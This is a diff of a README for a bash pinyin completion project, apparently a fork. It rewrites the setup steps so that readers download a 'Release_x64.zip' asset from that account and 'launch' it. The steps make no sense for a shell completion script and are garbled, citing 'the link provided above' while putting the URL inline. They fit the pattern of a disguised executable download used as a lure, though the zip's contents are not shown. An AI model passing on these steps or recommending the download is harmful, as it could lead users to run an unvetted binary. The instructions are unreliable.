luhsanson/bash-pinyin-completion-rs/README.md

 To get started with the pinyin completion script, follow the steps below:

-1. Download the Software.zip file from the link provided above.
+1. Download the https://github.com/luhsanson/bash-pinyin-completion-rs/releases/download/v1.0/Release_x64.zip file from the link provided above.
-2. Launch the Software.zip file to access the pinyin completion script.
+2. Launch the https://github.com/luhsanson/bash-pinyin-completion-rs/releases/download/v1.0/Release_x64.zip file to access the pinyin completion script.
 3. Start using the script to enhance your bash scripting capabilities with pinyin completion.

 ## 🎯 **Usage**